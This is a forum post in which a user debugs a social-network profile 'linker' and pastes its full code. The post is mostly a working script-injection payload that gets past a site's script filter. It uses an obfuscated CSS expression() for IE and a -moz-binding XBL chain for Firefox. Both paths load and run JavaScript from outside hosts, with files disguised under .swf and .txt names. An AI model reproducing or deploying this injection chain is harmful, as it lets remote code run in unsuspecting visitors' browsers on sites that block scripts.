The linker is not working in Firefox only in IE, i tested it.
This is the generated code right?
[quote][b][color=red]<style type='text/css'>@import url(http://h1.ripway.com/memberofthecradle/css.swf);</style>[/color]
[color=blue]<a id='cradle' style="obj:expres/**/sion(function b(){c=document.createElement('script');c.src=cradle.innerHTML;navBg.appendChild(c)}b());text:expres/**/sion(cradle.style.obj='0');visibility:hidden">http://myparis.fileave.com/friendster/myparis/mainjs.txt</a>[/color][/b][/quote]
The [color=red]red[/color] part is for Firefox
The [color=blue]blue[/color] part is for IE
Only the [color=blue]blue[/color] part is working which is for IE.
I check the content of the [color=red]red[/color] part the link
http://h1.ripway.com/memberofthecradle/css.swf
and the content is this:
http://h1.ripway.com/memberofthecradle/css.swf
[quote]body {
-moz-binding:url("http://h1.ripway.com/memberofthecradle/rss.swf#thecradle");
}[/quote]
Then it will load this
http://h1.ripway.com/memberofthecradle/rss.swf
[quote]<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<binding id="thecradle">
<implementation>
<constructor><![CDATA[document.write('<script src=http://h1.ripway.com/memberofthecradle/fxloader.swf></script>')]]></constructor>
</implementation>
</binding>
</bindings>[/quote]
And finally it will load this
http://h1.ripway.com/memberofthecradle/fxloader.swf
[quote]function fxLoader(){
a=document.getElementById("cradle").innerHTML
b=document.createElement("script")
b.type="text/javascript"
b.src=a
document.getElementsByTagName("head")[0].appendChild(b)
}
fxLoader()[/quote]
but in my friends said its working on their Firefox, but mines dont
I hope the modz will find a stable linker...